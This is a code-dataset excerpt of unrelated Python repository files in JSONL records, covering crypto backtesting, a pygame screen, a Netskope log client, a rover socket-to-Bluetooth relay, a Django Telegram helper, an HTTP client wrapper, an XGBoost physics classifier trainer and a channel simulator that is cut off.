float(_val)\n elif _key == end_coin:\n self.end_balance += float(_val)\n else:\n pass\n # print(info_dict)\n # print(end_balance)\n\n\n # 转换成一份\n def to_fund(self):\n if self.end_balance == 0:\n\n self.btc_balance.append(0)\n else:\n self.btc_balance.append(self.end_balance)\n # 按初始金额 以BTC为结算标的\n # info = {} # 保存现在 和 初始的差值信息\n # for sym, val in self.cash.items():\n # for new_sym, new_val in self.balance_dict.items():\n # print('cash', self.cash)\n # print('balance', self.balance_dict)\n # if sym == new_sym:\n # info[sym] = float(new_val) - float(val)\n # print('差值', info)\n\n\n\n\n # exit()\n # self.today {key :symbol_list}\n # info 各个差值\n\n # btc_list = []\n # for sy, va in info.items():\n # if sy != 'BTC':\n # for symbol, price in self.today_symbol_price.items():\n # if sy == symbol and sy != 'USD':\n # _btc = float(va) * float(price)\n # btc_list.append(_btc)\n # elif sy == symbol and sy == 'USD':\n # _btc = float(price) / float(va)\n # btc_list.append(_btc)\n # else:\n # pass\n # else:\n # btc_list.append(va)\n # btc_balance = sum(btc_list)\n #\n # self.btc_balance.append(self.cash['BTC'] + btc_balance)\n # print('转换成btc', self.btc_balance)\n\n # exit()\n\n # 最后一天结算\n def lastday_balance(self):\n # 全部则换成end_coin 值\n info = {} # 保存现在 和 初始的差值信息\n for sym, val in self.cash.items():\n for new_sym, new_val in self.balance_dict.items():\n # print('cash', self.cash)\n # print('balance', self.balance_dict)\n if sym == new_sym:\n info[sym] = float(new_val) - float(val)\n print('最后一日差值', info)\n\n symbol_coin = self.symbol_list[0]\n first_coin = symbol_coin[0:3]\n end_coin = symbol_coin[-3:]\n # print(first_coin, end_coin)\n # exit()\n self.end_balance = 0\n for _key, _val in info.items():\n if _key == first_coin:\n self.end_balance += float(self.today_symbol_price[symbol_coin]) * float(_val)\n elif _key == end_coin:\n self.end_balance += float(_val)\n else:\n pass\n print(self.end_balance)\n self.btc_balance.remove(self.btc_balance[-1])\n self.btc_balance.append(self.end_balance)\n\n\n # #########最后一天结算 允许容纳多少量#############\n for _key, _val in self.csv_balance_dict.items():\n symbol_coin = self.symbol_list[0]\n\n if self.symbol_list[0][0:3] == _key:\n\n first_abs = max([abs(i) for i in self.csv_balance_dict[_key]])\n self.allow_min_coin_dict[_key] = first_abs\n val1 = first_abs * self.firstday_symbol_price[symbol_coin]\n # print(first_abs)\n elif self.symbol_list[0][-3:] == _key:\n end_abs = max([abs(i) for i in self.csv_balance_dict[_key]])\n self.allow_min_coin_dict[_key] = end_abs\n val2 = end_abs\n # print(end_abs)\n else:\n pass\n\n # 允许最小的货币量\n min_cash = val1 + val2\n # print(min_cash)\n self.para_allowCash = min_cash\n\n # 处理数据\n def handle_data(self, data_dict=None, today=None, price_type=None):\n\n # 获取一组数据 作为遍历的样本 TODO 后期需要更改\n data = data_dict[list(data_dict.keys())[0]]\n\n\n self.csv_time_list = data.index\n self.csv_dataPrice_list = data[data.columns[0]].tolist()\n\n # 生成策略实例对象\n s = Strategy(account=self, strategy_arg=self.strategy_arg)\n\n for i in range(len(data)):\n if i == 0:\n for _key in data_dict.keys():\n self.firstday_symbol_price[_key] = data_dict[_key][data_dict[_key].columns[0]][0]\n\n # 定量 变量值\n today = data.index[i] # 时间戳\n print(type(today))\n # exit()\n # today_str = datetime.datetime.strftime(today, \"%Y-%m-%d %H:%M:%S\")\n price = data[data.columns[0]][i]\n\n # TODO 获取当天symbol_list 对应的价格 为后续 则和成初始化分数\n for _key in data_dict.keys():\n self.today_symbol_price[_key] = data_dict[_key][data_dict[_key].columns[0]][i]\n\n # 给实例对象传入当日之前的历史数据\n before_data = self.get_before_data(data, i)\n\n info_d = {}\n info_d['before_data'] = before_data\n info_d['dataLen'] = i # 记入数据长度\n\n # 获取交易信号\n info = s.get_signal(info_d)\n print('当前时刻{}-价格{}'.format(today, price))\n\n # 处理信号 整合信息\n self.handle_signal(info, data, i)\n\n # 遍历市价单\n for signal_dict in self.historyOrder_list:\n if today == signal_dict['date_time']:\n self.handle_balance(signal_dict)\n\n # 遍历限价单\n for limit_order_index in range(len(self.historyLimitOrder_list)):\n if self.historyLimitOrder_list[limit_order_index]['side'] == 'buy':\n if price >= self.historyLimitOrder_list[limit_order_index]['price']:\n print('执行限价单操作--buy')\n self.handle_balance(self.historyLimitOrder_list[limit_order_index])\n self.historyLimitOrder_list.remove(self.historyLimitOrder_list[limit_order_index])\n\n else:\n if price <= self.historyLimitOrder_list[limit_order_index]['price']:\n print('执行限价单操作--sell')\n self.handle_balance(self.historyLimitOrder_list[limit_order_index])\n self.historyLimitOrder_list.remove(self.historyLimitOrder_list[limit_order_index])\n\n # 执行平仓交易\n self.MA = s.MA\n # 添加余额\n for symbol in self.balance_dict.keys():\n l = self.csv_balance_dict[symbol]\n vol = copy.deepcopy(self.balance_dict)\n\n ll = copy.deepcopy(self.csv_balance_dict[symbol])\n ll.append(vol[symbol])\n self.csv_balance_dict[symbol] = ll\n\n print(self.csv_balance_dict)\n # TODO 添加相关信息 为可视化输出 服务\n self.to_fund()\n # exit()\n\n # 最后一个交易日进行结算\n self.lastday_balance()\n\n\n\n\n\nif __name__ == '__main__':\n pass","repo_name":"DreamXinxin/BT","sub_path":"Account/accountSpot.py","file_name":"accountSpot.py","file_ext":"py","file_size_in_byte":14630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14282061653","text":"import pygame\nfrom classes.default import defaultStatus\n\nclass Death:\n def __init__(self, status, screen):\n self.font = pygame.font.Font(None, 50)\n self.font1 = pygame.font.Font(None, 30)\n self.background = pygame.image.load('assets/gameOver.png')\n self.title, self.score, self.wave = \"\", \"\", \"\"\n self.playBtn = pygame.Rect((345, 600), (505,60))\n self.status = status\n self.screen = screen\n\n def run(self, window):\n '''Faz a chamada de todas as funcoes necessarias para renderizar a essa tela.'''\n self.draw()\n self.getEvents(window)\n\n def getEvents(self, window):\n '''Recebe inputs do jogador. Reinicia o status e tela Game para iniciar um novo jogo.'''\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.status[\"running\"] = False\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n self.status[\"current\"] = \"start\" \n defaultStatus(self.status)\n if event.type == pygame.MOUSEBUTTONDOWN:\n mouse = pygame.mouse.get_pos()\n if self.playBtn.collidepoint(mouse):\n self.status[\"current\"] = \"start\" \n defaultStatus(self.status)\n \n def draw(self):\n '''Desenha na tela os indicadores de game status.'''\n self.textRender()\n self.screen.blit(self.background,(0,0))\n self.screen.blit(self.wave,(815,543))\n self.screen.blit(self.score,(765,443))\n self.screen.blit(self.time,(700,494))\n \n def textRender(self):\n '''Renderiza o titulo e indicadores de pontuacao e tempo.'''\n self.score = self.font.render(str(self.status[\"destroyedMeteor\"]), False, (255, 255, 255))\n self.time = self.font.render(str(self.status[\"gameDuration\"]), False, (255, 255, 255))\n self.wave = self.font.render(str(self.status[\"wave\"]), False, (255, 255, 255))","repo_name":"juliapaiva1/Astrobirds","sub_path":"screens/death.py","file_name":"death.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31611577037","text":"\"\"\" This module defines the EventClient class which adds the following\nto the inherited BaseNetskopeClient class: log types (self.type_list),\nendpoint type (self.endpoint_type), and the URL endpoint used to pull\nlogs for Nestkope Events.\n\"\"\"\n\nimport os\n\nfrom netskope_fetcher.base import BaseNetskopeClient\n\n\nclass EventClient(BaseNetskopeClient):\n\n \"\"\" Holds information to be used when pulling down 'Event' logs.\n\n Inherits\n ----------\n BaseNetskopeClient\n\n Attributes\n ----------\n type_list: list\n The various types of logs that can be pulled down from Netskope\n according to Netskope documentation.\n https://valvoline.eu.goskope.com/docs/Netskope_Help/en/\n rest-api/http-endpoints.html\n endpoint_type: str\n The netskope rest endpoint that this object relates to.\n url: str\n The URL of the endpoint\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.type_list = [\"page\", \"application\", \"audit\", \"infrastructure\"]\n self.endpoint_type = \"event\"\n\n url = kwargs.get(\"url\", None)\n\n self.url = url or (\n \"https://{}.eu.goskope.com/api/v1/events\"\n \"\".format(os.environ[\"NETSKOPE_TENANT_NAME\"])\n )\n","repo_name":"IntegralDefense/netskope_log_fetcher","sub_path":"netskope_fetcher/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33042040949","text":"# external modules\r\nimport socket\r\nimport sys\r\nimport time\r\nimport serial\r\nimport os\r\nimport time\r\nimport numpy as np\r\nimport threading\r\nimport subprocess\r\n\r\n# internal modules\r\nimport sys\r\nsys.path.append(\"../common/\")\r\nfrom NetworkHandler import *\r\n\r\nclass Rover:\r\n \"\"\"\r\n A Class for handling communication with the Server operating\r\n externally.\r\n \"\"\"\r\n\r\n def start(self, ip='192.168.100.14', port=6909):\r\n # def start(self, ip='192.168.43.22', port=6909):\r\n \"\"\"\r\n Kickstarts the rover.\r\n - Creates socket\r\n - Sends connection request to Server\r\n - Once connected, performs the following in parallel:\r\n - calls listen()\r\n \"\"\"\r\n try:\r\n self.bluetooth_port = serial.Serial('/dev/rfcomm0',9600)\r\n self.rover_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.rover_socket.connect((ip,port))\r\n #self.flask_server = subprocess.Popen(['python3', 'rover/flask-server.py'])\r\n self.messagesListenerThread = threading.Thread(target=self.handle_incoming_messages)\r\n self.messagesListenerThread.start()\r\n self.messagesListenerThread.join()\r\n finally:\r\n self.cleanUp()\r\n\r\n def handle_incoming_messages(self):\r\n \"\"\"\r\n Listens for messages from the Rover.\r\n \"\"\"\r\n while True:\r\n message = NetworkHandler().receive(self.rover_socket)\r\n if message:\r\n print(message)\r\n self.bluetooth_port.write(message)\r\n else:\r\n return\r\n\r\n def cleanUp(self):\r\n \"\"\"\r\n Closes Connections.\r\n \"\"\"\r\n try:\r\n if self.rover_socket is not None:\r\n self.rover_socket.close()\r\n if self.bluetooth_port is not None:\r\n self.bluetooth_port.close()\r\n except Exception as e:\r\n print(e)\r\n\r\nrover = Rover()\r\nrover.start()\r\n\r\n","repo_name":"amm98d/scout-rover","sub_path":"rover/rover.py","file_name":"rover.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"43164669663","text":"import os, django\r\nimport sys\r\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\r\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"config.settings\")\r\ndjango.setup()\r\nimport asyncio\r\nfrom models.models import User\r\n\r\n\r\nasync def add_service(user_login, service): # Добавляет сервис\r\n user = User.objects.get(tgid=user_login) #получили строчку пользователя с нашим tgid в перемнную user\r\n subs = user.subscribes #получаем его подписки в перемнную subs\r\n subs = subs + \" \" + service + \",\" #добавляем в строчку наш новый\r\n user.subscribes = subs #переприсваиваем полю подписок нашу \r\n user.save() #сохраняем\r\n\r\n\r\nasync def remove_service(user_login, service): # Удаляет сервис\r\n user = User.objects.get(tgid=user_login)\r\n subs = user.subscribes\r\n subs = subs.split(service+\",\")\r\n subs = str(subs[0]+subs[1])\r\n print(subs)\r\n user.subscribes = subs\r\n user.save()\r\n\r\n\r\n\r\n# asyncio.run(add_service(975083397, \"bmstu\"))","repo_name":"Morzan6/university-checker","sub_path":"university-checker/tgbot/add_remove_service.py","file_name":"add_remove_service.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"42154943261","text":"import requests\nimport json\nfrom requests.exceptions import ConnectionError\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\nimport requests_cache\n\n\n\nDEFAULT_TIMEOUT = 5 # seconds\n\nclass TimeoutHTTPAdapter(HTTPAdapter):\n def __init__(self, *args, **kwargs):\n self.timeout = DEFAULT_TIMEOUT\n if \"timeout\" in kwargs:\n self.timeout = kwargs[\"timeout\"]\n del kwargs[\"timeout\"]\n super().__init__(*args, **kwargs)\n\n\n\nclass BaseClient:\n\n def _get_session(self, token):\n session = requests.Session()\n session.headers.update({\n 'Content-Type': 'application/json',\n 'Authorization': token,\n })\n return session\n\n def _get_cached_session(self, token):\n session = requests_cache.CachedSession('client_cache')\n session.headers.update({\n 'Content-Type': 'application/json',\n 'Authorization': token,\n })\n return session\n\n\n def _request_get(self, url, token, timeout = 5, retry = 5 , ttl = None):\n session = self._get_cached_session(token)\n\n adapter_time = TimeoutHTTPAdapter(timeout=timeout)\n adapter_retry = HTTPAdapter(max_retries=Retry(total=retry))\n\n session.mount(\"https://\", adapter_retry)\n session.mount(\"https://\", adapter_time)\n \n try:\n response = session.get(url, expire_after=ttl)\n \n except ConnectionError:\n return False\n\n return response\n\n def _request_post(self, url, token, timeout = 5, retry = 5, data = None):\n session = self._get_session(token)\n\n adapter_time = TimeoutHTTPAdapter(timeout=timeout)\n adapter_retry = HTTPAdapter(max_retries=Retry(total=retry))\n\n session.mount(\"https://\", adapter_retry)\n session.mount(\"https://\", adapter_time)\n try:\n response = session.post(url, data = json.dumps(data))\n \n except ConnectionError:\n return False\n\n return response\n\n","repo_name":"Lucas-loliveira/iclinic-challenge","sub_path":"prescriptions/serializers/client/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70572460692","text":"import pandas as pd\nimport numpy as np\nimport math\nfrom copy import copy\nfrom .xgboost2tmva import *\nimport seaborn as sns\n\nfrom sklearn.metrics import roc_auc_score, roc_curve, accuracy_score\nimport xgboost as xg\nfrom sklearn.model_selection import GridSearchCV\n\nfrom hyperopt import hp\nfrom hyperopt import fmin, tpe, rand,STATUS_OK, STATUS_FAIL,space_eval,Trials\n\nimport xgboost as xgb\nfrom sklearn.metrics import mean_squared_error\nfrom .ntuple_meta import *\n\n\nimport matplotlib.pyplot as plt\n\n\ndef MetricFunc(S,B,Br=10,std=False):\n if std:\n return S/np.sqrt(S+B)\n else:\n return math.sqrt(2*((S+B+Br)*math.log(1+(S/(B+Br)))-S))\n\n\nclass train_bdt():\n def __init__(self, *args, **kwargs):\n\n\n self.data = kwargs['data'] \n self.sig_name = kwargs['signal'][0]\n self.bkg_name = kwargs['background'][0]\n self.queryString = kwargs['queryString']\n self.params = kwargs['params']\n self.df,self.signal,self.background = self.prepareSB(self.data,[self.sig_name],[self.bkg_name],self.queryString)\n \n if 'prune' in kwargs:\n print(\"pruning variables with high correlation\")\n self.bdt_vars = self.prune_variables(self.signal,kwargs['bdt_vars'],kwargs['prune'])\n else:\n self.bdt_vars = kwargs['bdt_vars']\n \n\n\n trainFrac = 0.8\n validFrac = 0.1\n \n\n np.random.seed(1234)\n theShape = self.df.shape[0]\n ShuffleDF = np.random.permutation(theShape)\n TrainLimit = int(theShape*trainFrac)\n ValidLimit = int(theShape*(trainFrac+validFrac))\n\n\n X = self.df[self.bdt_vars].values\n Y = self.df['proc'].values\n weight = self.df['weight'].values\n\n\n #Shuffle stuff around\n X = X [ShuffleDF]\n Y = Y [ShuffleDF] \n weight = weight [ShuffleDF] \n\n\n #Splitting for training and validation\n TrainX,ValidX,TestX = np.split(X,[TrainLimit,ValidLimit])\n TrainY,ValidY,TestY = np.split(Y,[TrainLimit,ValidLimit])\n TrainW,ValidW,TestW = np.split(weight,[TrainLimit,ValidLimit])\n\n self.TrainX,self.ValidX,self.TestX = TrainX,ValidX,TestX\n self.TrainY,self.ValidY,self.TestY = TrainY,ValidY,TestY\n self.TrainW,self.ValidW,self.TestW = TrainW,ValidW,TestW \n \n training = xg.DMatrix(TrainX,label = TrainY, weight = TrainW,feature_names = self.bdt_vars)\n testing = xg.DMatrix(TestX, label = TestY , weight = TestW, feature_names = self.bdt_vars)\n validating = xg.DMatrix(ValidX, label = ValidY , weight = ValidW, feature_names = self.bdt_vars)\n\n self.training_data = training\n self.testing_data = testing\n self.validating_data = validating\n\n \n\n\n # pass\n\n def prune_variables(self,df, init_vars,plot=False):\n cormat = df[init_vars].corr()\n if plot:\n plt.figure(figsize=(32, 12))\n sns.heatmap(cormat,annot=True)\n \n corr = cormat\n columns = np.full((corr.shape[0],), True, dtype=bool)\n for i in range(corr.shape[0]):\n for j in range(i+1, corr.shape[0]):\n if corr.iloc[i,j] >= 0.9 or corr.iloc[i,j] <= -0.9 :\n if columns[j]:\n columns[j] = False\n \n \n selected_column = df[init_vars].columns[columns]\n \n if plot:\n cormat = df[selected_column].corr()\n plt.figure(figsize=(32, 12))\n sns.heatmap(cormat,annot=True)\n \n return selected_column\n\n\n def get_sample_size(self):\n return (self.TrainX.shape[0],self.ValidX.shape[0],self.TestX.shape[0])\n\n def AUC(self,quite=True):\n self.train_auc = roc_auc_score(self.TrainY, self.PredY_train, sample_weight=self.TrainW)\n self.test_auc = roc_auc_score(self.TestY, self.PredY_test, sample_weight=self.TestW)\n self.valid_auc = roc_auc_score(self.ValidY, self.PredY_valid, sample_weight=self.ValidW)\n self.STXS_mva_auc = roc_auc_score(self.df.proc, self.df.vh_mva, sample_weight=self.df.weight)\n if (not quite):\n print ('Default training performance:')\n print ('area under roc curve for training set = %1.3f'%( self.train_auc) )\n print ('area under roc curve for test set = %1.3f'%( self.test_auc ) )\n print ('area under roc curve for validity set = %1.3f'%( self.valid_auc ) )\n print ('area under roc curve for STXS MVA = %1.3f'%( self.STXS_mva_auc ) )\n pass\n\n\n\n\n\n def ROC(self):\n #Plotting\n # plt.figure(1)\n self.train_auc = roc_auc_score(self.TrainY, self.PredY_train, sample_weight=self.TrainW)\n self.test_auc = roc_auc_score(self.TestY, self.PredY_test, sample_weight=self.TestW)\n self.valid_auc = roc_auc_score(self.ValidY, self.PredY_valid, sample_weight=self.ValidW)\n \n\n\n f,ax = plt.subplots(figsize=(8,8))\n\n bkgEff, sigEff, nada = roc_curve(self.TrainY, self.PredY_train, sample_weight=self.TrainW)\n ax.plot(bkgEff, sigEff,label=f'Train:{self.TrainX.shape[0]}; AOC = {round(self.train_auc,3)}')\n\n bkgEff, sigEff, nada = roc_curve(self.TestY, self.PredY_test, sample_weight=self.TestW)\n ax.plot(bkgEff, sigEff,label=f'Test:{self.TestX.shape[0]}; AOC = {round(self.test_auc,3)}')\n\n bkgEff, sigEff, nada = roc_curve(self.ValidY, self.PredY_valid, sample_weight=self.ValidW)\n ax.plot(bkgEff, sigEff,label=f'Valid:{self.ValidX.shape[0]}; AOC = {round(self.valid_auc,3)}')\n\n\n #WH_MVA\n bkgEff, sigEff, nada = roc_curve(self.df.proc, self.df.vh_mva, sample_weight=self.df.weight)\n vh_mva_aoc = roc_auc_score(self.df.proc, self.df.vh_mva, sample_weight=self.df.weight) \n ax.plot(bkgEff, sigEff,label=f'STXS MVA AOC={round(vh_mva_aoc,3)}')\n\n plt.legend(loc='lower right')\n plt.title(f\"{self.sig_name }\")\n plt.xlabel('Background efficiency')\n plt.ylabel('Signal efficiency')\n\n\n\n def MVA_plt(self, AMS=False):\n\n f,ax = plt.subplots(figsize=(8,8))\n binx = np.linspace(0.0,1,50)\n\n\n\n\n\n def get_mva_local(X,weight):\n data = xg.DMatrix(X, feature_names=self.bdt_vars,weight = weight)\n return self.model.predict(data)\n\n\n def test_train_valid(signal= 1):\n test_train_valid = (\n get_mva_local(self.TrainX[self.TrainY == signal],self.TrainW[self.TrainY == signal])\n ,get_mva_local(self.TestX[self.TestY == signal],self.TestW[self.TestY == signal])\n ,get_mva_local(self.ValidX[self.ValidY == signal],self.ValidW[self.ValidY == signal]) \n )\n\n train = test_train_valid[0]\n test = test_train_valid[1]\n valid = test_train_valid[2]\n\n test_train_valid_weight = (\n self.TrainW[self.TrainY == signal],\n self.TestW[self.TestY == signal],\n self.ValidW[self.ValidY == signal])\n\n\n\n if signal:\n test_train_valid_colors = (\n 'green',\n \"mediumspringgreen\",\n \"lightseagreen\"\n )\n test_train_valid_labels = (\n \" Signal Train\",\n 'Signal Test',\n \"Signal Valid\"\n )\n else:\n test_train_valid_colors = (\n \"tomato\",\n 'lightsalmon',\n \"darkorange\"\n )\n test_train_valid_labels = (\n \"Background Train\",\n 'Background Test',\n \"Background Valid\" \n )\n\n\n\n # _=ax.hist(test_train_valid\n # ,bins=binx\n # ,linewidth=2\n # # ,histtype='step'\n # ,stacked=True\n # ,label=test_train_valid_labels\n\n # ,color=test_train_valid_colors\n # ,weights = test_train_valid_weight\n # # ,density=1\n # )\n\n\n counts,bins = np.histogram(\n test,\n bins=binx,\n weights= test_train_valid_weight[1],\n density = 1\n ) \n\n counts_err,bins = np.histogram(\n test,\n bins=binx,\n # weights= test_train_valid_weight[1],\n ) \n\n\n\n if (signal):\n color = 'blue'\n else:\n color = 'red'\n\n x_points = bins[:-1] + 0.5*(bins[1]-bins[0])\n _=ax.errorbar(\n x_points[counts > 0],\n counts[counts >0],\n fmt='o',\n yerr = 1/(np.sqrt(counts_err[counts >0])),\n label = test_train_valid_labels[1],\n color = color,\n ecolor = 'k',\n capsize = 1.5\n )\n\n\n\n\n\n\n def calc_ams(df):\n def get_ams(df,metric_cut):\n dff = copy(df[df.anom_mva > metric_cut])\n sig = dff[dff.proc==1]\n bkg = dff[dff.proc==0]\n ams = MetricFunc(np.sum(sig.weight),np.sum(bkg.weight),std=False)\n return ams\n X,Y = [],[]\n for i in np.linspace(0,1,50):\n X.append(i)\n Y.append(get_ams(df,i))\n ax2 = ax.twinx()\n max_indx = Y.index(max(Y))\n # ax2.axvline(X[max_indx],\n # ymin=max(Y)-2,\n # ymax = max(Y)+2,\n # color='red'\n # )\n ax2.plot(X,Y,'r-.',linewidth=3,label=f'AMS max = {round(X[max_indx],2)},{round(Y[max_indx],2)}')\n ax2.set_ylabel('AMS')\n ax2.set_ylim(0,20)\n\n legend_kargs = {\n \"bbox_to_anchor\":(.375, .8),\n # \"loc\":'upper left',\n \"borderpad\":1,\n \"handletextpad\":1,\n \"fontsize\":11,\n \"labelspacing\":1,\n \"fancybox\":True\n }\n _=ax2.legend(**legend_kargs)\n # _=ax2.grid()\n\n\n\n \n legend_kargs = {\n # \"bbox_to_anchor\":(.5, 1),\n \"loc\":'upper left',\n \"borderpad\":1,\n \"handletextpad\":1,\n \"fontsize\":11,\n \"labelspacing\":1,\n \"fancybox\":True,\n 'ncol':2\n }\n \n\n\n #Signal\n\n\n\n test_train_valid(signal= 1)\n _=ax.hist(self.get_mva(self.signal)\n ,bins=binx\n ,linewidth=2\n # ,histtype='step'\n ,label=anom_labels[self.sig_name]\n # ,color='darkgreen'\n ,fc=(0,0,1,.5)\n ,weights = self.signal.weight\n ,density=1\n )\n _=ax.hist(self.get_mva(self.signal)\n ,bins=binx\n ,linewidth=2\n ,histtype='step'\n # ,label=WHanom_label[self.sig_name]\n ,color='blue'\n # ,fc=(0,0,1,.5)\n ,weights = self.signal.weight\n ,density=1\n )\n\n\n test_train_valid(signal= 0)\n _=ax.hist(self.get_mva(self.background)\n ,bins=binx\n ,linewidth=2\n # ,histtype='step'\n ,label=anom_labels[self.bkg_name]\n # ,color='maroon'\n ,fc=(1,0,0,.5)\n ,weights = self.background.weight\n ,density=1\n )\n _=ax.hist(self.get_mva(self.background)\n ,bins=binx\n ,linewidth=2\n ,histtype='step'\n # ,label=WHanom_label[self.bkg_name]\n ,color='red'\n # ,fc=(1,0,0,.5)\n ,weights = self.background.weight\n ,density=1\n )\n\n\n\n \n _=ax.legend(**legend_kargs)\n\n if (AMS):\n f,ax = plt.subplots(figsize=(8,8))\n _=ax.hist(self.get_mva(self.background)\n ,bins=binx\n ,linewidth=2\n ,histtype='step'\n # ,label=WHanom_label[self.bkg_name]\n ,color='red'\n # ,fc=(1,0,0,.5)\n ,weights = self.background.weight\n )\n\n\n calc_ams(self.df)\n _=ax.set_xlabel(r\"ANOM MVA\",fontsize=20)\n \n\n _=ax.set_ylabel(r\"Events\",fontsize=15)\n _=ax.set_xlabel(r\"BDT MVA\",fontsize=15)\n\n # _=plt.axvline(125,color='red',linestyle=\"--\")\n # _=plt.legend(**legend_kargs)\n _=plt.title(f\"{self.sig_name}\")\n # _=plt.text(140, 0.25, \"Weighted\",fontsize=15)\n # _=plt.grid()\n # _=plt.ylim(0,20)\n\n\n \n\n def get_mva(self, df):\n X = df[self.bdt_vars].values\n weight = df['weight'].values\n data = xg.DMatrix(X, feature_names=self.bdt_vars,weight = weight)\n return self.model.predict(data)\n\n \n def prepareSB(self,data,sigs,bkgs,queryString): #Get Background and Signal\n #preparing signal data\n sig_data = []\n for sig in sigs:\n print(sig)\n sig_data.append(data[sig])\n \n signal = pd.concat(sig_data,axis=0)\n signal['proc'] = np.ones(signal.shape[0])\n \n bkg_data = []\n for bkg in bkgs:\n bkg_data.append(data[bkg])\n \n background = pd.concat(bkg_data,axis=0)\n background['proc'] = np.zeros(background.shape[0])\n all_data = pd.concat((signal,background),axis=0)\n # all_data = all_data.query(queryString)\n return all_data,signal,background\n\n\n def hyperOpt(self,space,max_evals=100): \n self.trials = Trials()\n def fn(para):\n model = xg.train(para,self.training_data)\n# PredY_train = model.predict(self.training_data)\n# loss = -1*roc_auc_score(self.TrainY, PredY_train, sample_weight=self.TrainW) \n PredY_test = model.predict(self.testing_data)\n loss = -1*roc_auc_score(self.TestY, PredY_test, sample_weight=self.TestW) \n # print(para['colsample_bytree'])\n return {'loss': loss, 'status':STATUS_OK}\n\n result = fmin(fn=fn, space=space, algo=tpe.suggest,trials = self.trials ,max_evals=max_evals)\n \n self.HyperResult = space_eval(space,result)\n \n \n\n def train(self, params='default'):\n if params == 'default':\n params=self.params\n self.model = xg.train(params,self.training_data)\n self.PredY_train = self.model.predict(self.training_data)\n self.PredY_test = self.model.predict(self.testing_data)\n self.PredY_valid = self.model.predict(self.validating_data)\n self.df['anom_mva'] = self.get_mva(self.df)\n\n\n def train_classifier(self):\n params = self.params\n mdl = xg.XGBClassifier()\n self.model = mdl.fit(self.TrainX,self.TrainY,sample_weight= self.TrainW)\n self.PredY_train = self.model.predict(self.TrainX)#,sample_weight= self.TrainW)\n self.PredY_test = self.model.predict(self.TestX)#,sample_weight= self.TestW)\n self.PredY_valid = self.model.predict(self.ValidX)#, sample_weight= self.ValidW)\n \n\n # def train(self, params='default'):\n # if params == 'default':\n # params=self.params\n\n # self.model = xg.\n\n def plot_feature_importance(self):\n xgb.plot_importance(self.model,title=self.sig_name)\n \n\n def plot_var(self,var,binx=100,queryString=\"\"):\n f,ax = plt.subplots(figsize=(8,8))\n # binx = 100\n\n if queryString != \"\":\n sig = self.signal.query(queryString)[var]\n sig_weight = self.signal.query(queryString)['weight']\n bkg = self.background.query(queryString)[var]\n bkg_weight = self.background.query(queryString)['weight']\n else:\n sig = self.signal[var]\n sig_weight = self.signal['weight']\n bkg = self.background[var]\n bkg_weight = self.background['weight']\n \n\n\n _=ax.hist(sig\n ,bins=binx\n ,linewidth=2\n ,histtype='step'\n ,label=WHanom_label[self.sig_name]\n ,color='darkgreen'\n ,weights = sig_weight\n # ,density=1\n )\n\n\n _=ax.hist(bkg\n ,bins=binx\n ,linewidth=2\n ,histtype='step'\n ,label=WHanom_label[self.bkg_name]\n ,color='red'\n ,weights = bkg_weight\n # ,density=1\n )\n legend_kargs = {\n # \"bbox_to_anchor\":(.5, 1),\n \"loc\":'upper left',\n \"borderpad\":1,\n \"handletextpad\":1,\n \"fontsize\":11,\n \"labelspacing\":1,\n \"fancybox\":True,\n # 'ncol':2\n }\n ax.legend(**legend_kargs)\n ax.set_xlabel(var,fontsize=15)\n ax.set_ylabel(\"Events\",fontsize=15)\n\n\n\n \n def save_tmva_xml(self,file_loc=''):\n if file_loc=='':\n print(\"specify file location\")\n else:\n mdl = self.model.get_dump()\n input_vars=[]\n for key in self.bdt_vars:\n input_vars.append((key,'F'))\n # for i in input_vars:\n # print(i)\n\n convert_model(mdl,input_variables=input_vars,output_xml=file_loc)\n\n\n\n\ndef prepareSB(data,sigs,bkgs,queryString):\n #preparing signal data\n sig_data = []\n for sig in sigs:\n sig_data.append(data[sig])\n \n signal = pd.concat(sig_data,axis=0)\n signal['proc'] = np.ones(signal.shape[0])\n \n bkg_data = []\n for bkg in bkgs:\n bkg_data.append(data[bkg])\n \n background = pd.concat(bkg_data,axis=0)\n background['proc'] = np.zeros(background.shape[0])\n all_data = pd.concat((signal,background),axis=0)\n all_data = all_data.query(queryString)\n return all_data,signal,background","repo_name":"rohithsaradhy/vh_anom_bdt","sub_path":"tools/bdt_trainer.py","file_name":"bdt_trainer.py","file_ext":"py","file_size_in_byte":18678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36478577888","text":"from typing import Optional, Tuple\n\nimport numpy as np\nimport scipy.io as sio\n\nfrom sixg_radio_mgmt import Channel\n\n\nclass QuadrigaChannels(Channel):\n def __init__(\n self,\n max_number_ues: int,\n max_number_basestations: int,\n num_available_rbs: np.ndarray,\n rng: np.random.Generator = np.random.default_rng(),\n ) -> None:\n super().__init__(\n max_number_ues, max_number_basestations, num_available_rbs, rng\n )\n self.thermal_noise_power = 10e-14\n self.transmission_power = 0.1 # 0.1 Watts = 20 dBm\n self.episode_number = -1\n self.episode_channels = np.empty([])\n\n def step(\n self,\n step_number: int,\n episode_number: int,\n mobilities: np.ndarray,\n sched_decision: Optional[np.ndarray] = None,\n ) -> np.ndarray:\n if self.episode_number != episode_number:\n self.episode_number = episode_number\n self.episode_channels = self.read_mat_files(episode_number)\n\n if sched_decision is not 